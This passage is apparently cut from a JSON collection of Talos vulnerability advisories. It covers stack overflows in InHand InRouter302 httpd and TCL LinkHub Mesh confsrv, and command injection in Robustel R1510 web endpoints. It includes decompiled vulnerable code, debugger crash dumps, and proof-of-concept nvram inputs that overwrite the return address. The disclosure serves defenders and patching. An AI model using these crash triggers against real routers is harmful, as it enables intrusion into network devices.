This can lead to code execution.\n\n#### Crash Information\n \n \n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x7fcc9a46 \u2192 0x4c707fcc\n $v0 : 0x0\n $v1 : 0x3f\n $a0 : 0x1\n $a1 : 0x0\n $a2 : 0x1\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0x87fa118c\n $t2 : 0x8000\n $t3 : 0x0\n $t4 : 0x5d6\n $t5 : 0x87fa11d8\n $t6 : 0x8693dd1e\n $t7 : 0x10000\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x41414141 (\"AAAA\"?)\n $s2 : 0x41414141 (\"AAAA\"?)\n $s3 : 0x41414141 (\"AAAA\"?)\n $s4 : 0x41414141 (\"AAAA\"?)\n $s5 : 0x0047e938 \u2192 \"user_define_00\"\n $s6 : 0x00460000 \u2192 0xafb30024 (\"$\"?)\n $s7 : 0x2\n $t8 : 0x10\n $t9 : 0x00462af0 \u2192 0x8f998010\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x0047e938 \u2192 \"user_define_00\"\n $pc : 0x0040f914 \u2192 <user_define_print+268> jr ra\n $sp : 0x7fcc9ab8 \u2192 0x00000000\n $hi : 0x1d\n $lo : 0x89af0400\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x484d90\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x7fcc9ab8\u2502+0x0000: 0x00000000 \u2190 $sp\n 0x7fcc9abc\u2502+0x0004: 0x00000000\n 0x7fcc9ac0\u2502+0x0008: 0x7fcca7e4 \u2192 \"user_define_00\"\n 
0x7fcc9ac4\u2502+0x000c: 0x00000000\n 0x7fcc9ac8\u2502+0x0010: 0x00484d90\n 0x7fcc9acc\u2502+0x0014: 0x00000000\n 0x7fcc9ad0\u2502+0x0018: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7fcc9ad4\u2502+0x001c: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x40f908 <user_define_print+256> lw s2, 3264(sp)\n 0x40f90c <user_define_print+260> lw s1, 3260(sp)\n 0x40f910 <user_define_print+264> lw s0, 3256(sp)\n \u2192 0x40f914 <user_define_print+268> jr ra\n [!] Cannot disassemble from $PC\n \n\n#### Exploit Proof of Concept\n\nIf in the nvram configuration is defined as `user_define_timeout=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:1` and then the code at `[5]` is reached, the `httpd` binary would exhibit the crash shown above. The return address register, `ra`, has value 0x41414141.\n\n#### CVE-2022-26782 - httpd\u2019s user_define_set_item stack-based buffer overflow\n\nAn improper input validation vulnerability exists in the `httpd`\u2019s `user_define_set_item` function. Controlling the `user_define_timeout` nvram variable can lead to remote code execution.\n \n \n undefined4 user_define_set_item(cgi_table_entry *cgi_entry,dword value)\n \n {\n [...]\n timeout_struct timeout_struct [100];\n \n total_entries = user_define_init(timeout_struct); [6]\n [...]\n }\n \n\nThe `user_define_set_item` has an array of `timeout_struct` of 100 elements. 
The `user_define_init` function parses the data contained in `user_define_timeout` and fills the array:\n \n \n int user_define_init(timeout_struct *timeout_struct)\n \n {\n char *user_define_timeouts;\n int idx;\n char service_name [64];\n undefined4 service_timeout [3];\n \n idx = 0;\n memset(service_name,0,0x40);\n service_timeout[0] = 0;\n memset(timeout_struct,0,0x1a90);\n user_define_timeouts = (char *)nvram_default_get(\"user_define_timeout\",0);\n if ((user_define_timeouts != (char *)0x0) &&\n (user_define_timeouts = strtok(user_define_timeouts,\",\"), user_define_timeouts != (char *)0x0))\n {\n do {\n while( true ) {\n sscanf(user_define_timeouts,\"%[^:]:%d\",service_name,service_timeout); [8]\n if (service_name[0] != '\\0') break;\n user_define_timeouts = strtok((char *)0x0,\",\");\n if (user_define_timeouts == (char *)0x0) {\n return idx;\n }\n }\n user_define_timeouts = strcpy(timeout_struct[idx].service_name,service_name);\n idx = idx + 1;\n *(undefined4 *)(user_define_timeouts + 0x40) = service_timeout[0];\n user_define_timeouts = strtok((char *)0x0,\",\");\n } while (user_define_timeouts != (char *)0x0);\n }\n return idx;\n }\n \n\nThe nvram variable called `user_define_timeout` is a comma-separated string. Each value between the commas is of the form `<service_name>:<value>`. The `service_name` should be of the form `user_define_XX`, where `XX` ranges from `00` to `99`. However, anyone who can control the `user_define_timeout` nvram variable can place arbitrary values in it. The `user_define_init` function does not check how many commas are present in the `user_define_timeout` variable, and `idx` is never compared against the 100-element capacity of the array. This means that if there are 100 commas, the parsing of `<service_name>:<value>` at `[8]` will be performed out of bounds of the stack array. 
This can cause a stack-based buffer overflow in the `user_define_set_item`\u2019s stack frame, and can lead to code execution.\n\n#### Crash Information\n \n \n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x7ff38bf6 \u2192 0x4c707ff3\n $v0 : 0x0\n $v1 : 0x23\n $a0 : 0x1\n $a1 : 0x0\n $a2 : 0x1\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0x87fa118c\n $t2 : 0x8000\n $t3 : 0x0\n $t4 : 0x547\n $t5 : 0x87fa11d8\n $t6 : 0x8692dd1e\n $t7 : 0x10000\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x41414141 (\"AAAA\"?)\n $s2 : 0x41414141 (\"AAAA\"?)\n $s3 : 0x41414141 (\"AAAA\"?)\n $s4 : 0x41414141 (\"AAAA\"?)\n $s5 : 0x41414141 (\"AAAA\"?)\n $s6 : 0x00460000 \u2192 0xafb30024 (\"$\"?)\n $s7 : 0x2\n $t8 : 0x10\n $t9 : 0x00462af0 \u2192 0x8f998010\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x0047e938 \u2192 \"user_define_00\"\n $pc : 0x0040fa14 \u2192 <user_define_set_item+248> jr ra\n $sp : 0x7ff39938 \u2192 0x00000000\n $hi : 0x1\n $lo : 0x0\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x484d90\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x7ff39938\u2502+0x0000: 0x00000000 \u2190 $sp\n 0x7ff3993c\u2502+0x0004: 
0x00000000\n 0x7ff39940\u2502+0x0008: 0x00000000\n 0x7ff39944\u2502+0x000c: 0x00000000\n 0x7ff39948\u2502+0x0010: 0x00484d90\n 0x7ff3994c\u2502+0x0014: 0x00000000\n 0x7ff39950\u2502+0x0018: 0x00000042 (\"B\"?)\n 0x7ff39954\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x40fa08 <user_define_set_item+236> lw s2, 6836(sp)\n 0x40fa0c <user_define_set_item+240> lw s1, 6832(sp)\n 0x40fa10 <user_define_set_item+244> lw s0, 6828(sp)\n \u2192 0x40fa14 <user_define_set_item+248> jr ra\n [!] Cannot disassemble from $PC\n \n\n#### Exploit Proof of Concept\n\nIf in the nvram configuration is defined as `user_define_timeout=B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,B:1,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:41` and then the code at `[8]` is reached, the `httpd` binary would exhibit the crash shown above. The return address register, `ra`, of the `user_define_set_item` function has value 0x41414141.\n\n### Vendor Response\n\nThe vendor has updated their website and uploaded the latest firmware on it. 
https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4\n\nhttps://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf\n\n### Timeline\n\n2022-03-21 - Vendor Disclosure \n2022-05-10 - Public Release \n2022-05-10 - Vendor Patch Release \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "talos", "title": "InHand Networks InRouter302 libnvram.so nvram_import improper input validation vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26780", "CVE-2022-26781", "CVE-2022-26782"], "modified": "2022-05-10T00:00:00", "id": "TALOS-2022-1481", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1481", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:56:22", "description": "### Summary\n\nMultiple command injection vulnerabilities exist in the web_server action endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. 
An attacker can send a sequence of requests to trigger these vulnerabilities.\n\n### Tested Versions\n\nRobustel R1510 3.3.0\n\n### Product URLs\n\nR1510 - <https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/>\n\n### CVSSv3 Score\n\n9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n### Details\n\nThe R1510 is an industrial cellular router. It offers several advanced software features, such as an innovative use of OpenVPN, cloud management, a data over-use guard, smart reboot and others.\n\nThe R1510 has a web server that manages several endpoints. One group of endpoints has the form `/action/<API_endpoint>/`. Several of those endpoints pass user-provided parameters to unsafe functions, such as the standard `system` function and a custom one called `sysprintf`.\n\nHere is `sysprintf`:\n \n \n void sysprintf(char *format_string,char *param_2,char *param_3,char *param_4)\n \n {\n [...]\n \n va_list_ptr = va_list;\n va_list[0] = param_2;\n va_list[1] = param_3;\n va_list[2] = param_4;\n vsnprintf(shell_command,0x200,format_string,va_list_ptr); [1]\n system(shell_command); [2]\n return;\n }\n \n\nAt `[1]` a string is formatted, using the function\u2019s first argument as the format string and the other parameters as format string arguments. 
If one of the arguments is attacker-controlled, the formatted string is passed unescaped to `system`, and a command injection occurs at `[2]`.\n\n#### CVE-2022-33312 - /action/import_cert_file/ command injection\n\nThis command injection is in the `/action/import_cert_file/` API.\n\nThe function that handles that endpoint is:\n \n \n void /action/import_cert_file/(Webs *webs)\n \n {\n [...]\n \n [...]\n path = (char *)websGetVar(webs,\"path\",0); [3]\n if ((path != (char *)0x0) &&\n (target_file = websGetVar(webs,\"target_file\",0), target_file != 0)) {\n hash = scaselessmatch(webs->method,\"POST\");\n iVar7 = 0;\n if (hash != 0) {\n pWVar1 = hashFirst((char)webs->files);\n while (pWVar1 != (WebsKey *)0x0) {\n ppcVar9 = *(char ***)&(pWVar1->content).value;\n hash = dir_exists(path); [4]\n if (hash == 0) {\n sysprintf(\"mkdir -p %s\",path); [5]\n }\n [...]\n }\n \n\nAt `[3]` the variable `path` is fetched; then at `[4]` it is checked whether its value corresponds to an existing directory. If the directory does not exist, the value is used at `[5]` as an argument to the `sysprintf` function. 
This can lead to a command injection.\n \n\n#### CVE-2022-33313 - /action/import_https_cert_file/ command injection\n\nThis command injection is in the `/action/import_https_cert_file/` API.\n\nThe function that handles that endpoint is:\n \n \n void /action/import_https_cert_file/(Webs *webs)\n \n {\n [...]\n \n [...]\n type_var = websGetVar(webs,\"type\",0);\n path_var = websGetVar(webs,\"path\",0); [6]\n if ((type_var != 0) && (path_var != 0)) {\n iVar1 = scaselessmatch(webs->method,\"POST\");\n if (iVar1 != 0) {\n pWVar2 = hashFirst((char)webs->files);\n while (pWVar2 != (WebsKey *)0x0) {\n uploaded_location = *(undefined4 **)&(pWVar2->content).value;\n iVar1 = string_matched(type_var,\"ca\");\n if (iVar1 == 0) {\n iVar1 = string_matched(type_var,\"private_key\");\n if (iVar1 != 0) {\n path_formatted_value = \"%s/server.key\";\n goto LAB_00481458;\n }\n }\n else {\n path_formatted_value = \"%s/server.crt\";\n LAB_00481458:\n path_formatted_value = (char *)sfmt(path_formatted_value,path_var); [7]\n }\n if (path_formatted_value != (char *)0x0) {\n sysprintf(\"mv %s %s -f\",*uploaded_location,path_formatted_value); [8]\n [...]\n }\n \n\nAt `[6]` the variable `path` is fetched; then at `[7]` it is used as an argument to format a string whose template is selected by another provided variable (`type`). The formatted string is then used at `[8]` as an argument to the `sysprintf` function. 
This can lead to a command injection.\n\n#### CVE-2022-33314 - /action/import_sdk_file/ command injection\n\nThis command injection is in the `/action/import_sdk_file/` API.\n\nThe function that handles that endpoint is:\n \n \n void /action/import_sdk_file/(Webs *webs)\n \n {\n [...]\n \n [...]\n path_param = websGetVar(webs,\"path\",0); [9]\n if (path_param != 0) {\n websSetStatus(webs,200);\n websWriteHeaders(webs,0xffffffff,0);\n websWriteHeader(webs,\"Content-Type\",\"text/html\");\n websWriteEndHeaders(webs);\n iVar1 = scaselessmatch(webs->method,\"POST\");\n if (iVar1 != 0) {\n pWVar4 = hashFirst((char)webs->files);\n while (pWVar4 != (WebsKey *)0x0) {\n ppcVar8 = *(char ***)&(pWVar4->content).value;\n iVar1 = dir_exists(path_param); [10]\n if (iVar1 == 0) {\n sysprintf(\"mkdir -p %s\",path_param); [11]\n }\n [...]\n } \n \n\nAt `[9]` the variable `path` is fetched; then at `[10]` it is checked whether its value corresponds to an existing directory. If the directory does not exist, the value is used at `[11]` as an argument to the `sysprintf` function. 
This can lead to a command injection.\n\n### Timeline\n\n2022-06-27 - Initial vendor contact \n2022-06-28 - Vendor Disclosure \n2022-06-30 - Public Release \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "talos", "title": "Robustel R1510 web_server action endpoints OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-33312", "CVE-2022-33313", "CVE-2022-33314"], "modified": "2022-06-30T00:00:00", "id": "TALOS-2022-1572", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1572", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T18:56:20", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1455\n\n## TCL LinkHub Mesh Wifi confsrv set_mf_rule stack-based buffer overflow vulnerability\n\n##### August 1, 2022\n\n##### CVE Number\n\nCVE-2022-23919,CVE-2022-23918\n\n##### SUMMARY\n\nA stack-based buffer overflow vulnerability exists in the confsrv set_mf_rule functionality of TCL LinkHub Mesh Wifi MS1G_00_01.00_14. 
A specially-crafted network packet can lead to stack-based buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nTCL LinkHub Mesh Wifi MS1G_00_01.00_14\n\n##### PRODUCT URLS\n\nLinkHub Mesh Wifi - <https://www.tcl.com/us/en/products/connected-home/linkhub/linkhub-mesh-wifi-system-3-pack>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-121 - Stack-based Buffer Overflow\n\n##### DETAILS\n\nThe LinkHub Mesh WiFi system is a node-based mesh system designed for wifi deployments across large homes. These nodes include most features standard in current WiFi solutions and allow for easy expansion of the system by adding nodes. The mesh is managed solely by a phone application and the routers have no web-based management console.\n\nThe LinkHub Mesh system uses protobuffers to communicate both internally on the device as well as externally with the controlling phone application. These protobuffers can be sent to port 9003 while on the WiFi provided by the LinkHub Mesh in order to issue commands much like the phone application would. 
Once the protobuffer is received, it is routed internally starting from the `ucloud` binary and is dispatched to the appropriate handler.\n\nIn this case the handler is `confsrv`, which handles many message types; here we are interested in `mf_lists`:\n \n \n message mf_rule {\n required string ethaddr = 1; [1]\n optional string name = 2; [2]\n }\n message mf_lists {\n required int32 mode = 1;\n repeated MESSAGE_NOT_RESOLVED rules = 2; //This is not optional, so it must be resolved by hand to compile to .proto\n optional uint64 timestamp = 3;\n } \n \n\nThrough [1] and [2] we have control over both `ethaddr` and `name` in the packet. The function that parses the data within the protobuffer is `conf_set_mf_cfg`:\n \n \n 004141f0 int32_t conf_set_mf_cfg(int32_t arg1, int32_t arg2, int32_t arg3)\n \n 00414210 arg_0 = arg1\n 0041421c int32_t $a3\n 0041421c arg_c = $a3\n 0041423c void var_108\n 0041423c memset(&var_108, 0, 0x80)\n 00414264 void var_88\n 00414264 memset(&var_88, 0, 0x80)\n 00414288 struct MfLists* pkt = mf_lists__unpack(0, arg3, arg2) [3]\n 0041429c int32_t $v0_2\n 0041429c if (pkt == 0) {\n 004142c8 printf(\"[%s][%d][niuwu] Unpack failed %d\u2026\", \"conf_set_mf_cfg\", 0x103, arg3, 0x4ae4b0)\n 004142d4 $v0_2 = 0xffffffff\n 004142d4 } else {\n 004142e8 clear_all_mf_mib()\n 00414300 set_mf_rule(pkt: pkt) [4]\n 00414314 if (pkt->is_timestamp_present != 0) {\n 00414344 sprintf(&var_88, \"%llu\", pkt->timestamp.d, pkt->timestamp:4.d, 0x4ae4b0)\n 00414368 SetValue(name: \"sys.cfg.stamp\", input_buffer: &var_88)\n 0041435c }\n ...\n \n\nAt [3] the protobuffer is unpacked into a structure, and then at [4] the structure is passed into `set_mf_rule`:\n \n \n 00413b2c int32_t set_mf_rule(struct MfLists* pkt)\n \n 00413b54 uint8_t ethAddrBuffer[0x12]\n 00413b54 ethAddrBuffer[0].d = 0\n 00413b58 ethAddrBuffer[4].d = 0\n 00413b5c ethAddrBuffer[8].d = 0\n 00413b60 ethAddrBuffer[0xc].d = 0\n 00413b64 ethAddrBuffer[0x10].w = 0\n 00413b84 uint8_t nameBuffer[0x40]\n 00413b84 
memset(&nameBuffer, 0, 0x40)\n 00413bac uint8_t var_150[0x40]\n 00413bac memset(&var_150, 0, 0x40)\n 00413bd4 uint8_t var_110[0x80]\n 00413bd4 memset(&var_110, 0, 0x80)\n 00413bfc uint8_t var_90[0x80]\n 00413bfc memset(&var_90, 0, 0x80)\n 00413c08 int32_t var_1a8 = 0\n 00413c0c int32_t var_1ac = 0\n 00413c18 int32_t var_1b8 = 0\n 00413c1c int32_t var_1ac_1 = 0\n 00414080 int32_t $v0_31\n 00414080 while (true) {\n 00414080 $v0_31 = var_1ac_1 s< 2 ? 1 : 0\n 00414084 if ($v0_31 == 0) {\n 00414084 break\n 00414084 }\n 00413c2c int32_t var_1b0_1\n 00413c2c if (var_1ac_1 != 0) {\n 00413c48 var_1b0_1 = 5\n 00413c48 } else {\n 00413c38 var_1b0_1 = 2\n 00413c38 }\n 00413f54 uint8_t (* var_1c8)[0x40]\n 00413f54 for (int32_t loop_idx = 0; loop_idx u< pkt->rules_count; loop_idx = loop_idx + 1) {\n 00413c6c struct MfRule* $v0_6 = *(pkt->rules + (loop_idx << 2))\n 00413c8c memset(&ethAddrBuffer, 0, 0x12) [5]\n 00413cb0 memset(&nameBuffer, 0, 0x40) [6]\n 00413cc0 if ($v0_6 != 0) {\n 00413cd0 if ($v0_6->ethAddr != 0) {\n 00413d18 memcpy(&ethAddrBuffer, $v0_6->ethAddr, strlen($v0_6->ethAddr)) [7]\n 00413ce4 }\n 00413d2c if ($v0_6->name != 0) {\n 00413d74 memcpy(&nameBuffer, $v0_6->name, strlen($v0_6->name)) [8]\n 00413d40 } \n ....\n \n\n#### CVE-2022-23918 - ethAddr stack buffer overflow\n\nAs seen above, the `memcpy` of `ethAddr` at [7] writes into `ethAddrBuffer`, a stack-based buffer of size 0x12 (cleared at [5]).\n \n \n 00413cd8 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413cdc 0c00508c lw $s0, 0xc($v0) {MfRule::ethAddr}\n 00413ce0 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413ce4 0c00428c lw $v0, 0xc($v0) {MfRule::ethAddr}\n 00413ce8 21204000 move $a0, $v0\n 00413cec c08a828f lw $v0, -0x7540($gp) {strlen} [9]\n 00413cf0 21c84000 move $t9, $v0\n 00413cf4 09f82003 jalr $t9\n 00413cf8 00000000 nop \n 00413cfc 1800dc8f lw $gp, 0x18($fp) {var_1c0}\n 00413d00 3400c327 addiu $v1, $fp, 0x34 {ethAddrBuffer}\n 00413d04 21206000 move $a0, $v1 {ethAddrBuffer}\n 00413d08 21280002 move $a1, $s0\n 00413d0c 21304000 move $a2, $v0\n 
00413d10 b88b828f lw $v0, -0x7448($gp) {memcpy}\n 00413d14 21c84000 move $t9, $v0\n 00413d18 09f82003 jalr $t9\n 00413d1c 00000000 nop \n \n\nAt [7] and [9] we can see that the length of the `memcpy` is not the static size of the buffer, but instead the `strlen` of the user data provided from the protobuf packet. This results in a simple stack buffer overflow.\n\n#### Crash Information\n \n \n Program received signal SIGSEGV, Segmentation fault.\n 0x41414141 in ?? ()\n [ Legend: Modified register | Code | Heap | Stack | String ]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x806f0000\n $v0 : 0x0\n $v1 : 0x2\n $a0 : 0x11\n $a1 : 0x2\n $a2 : 0x200\n $a3 : 0x0\n $t0 : 0x1\n $t1 : 0x41414141 (\"AAAA\"?)\n $t2 : 
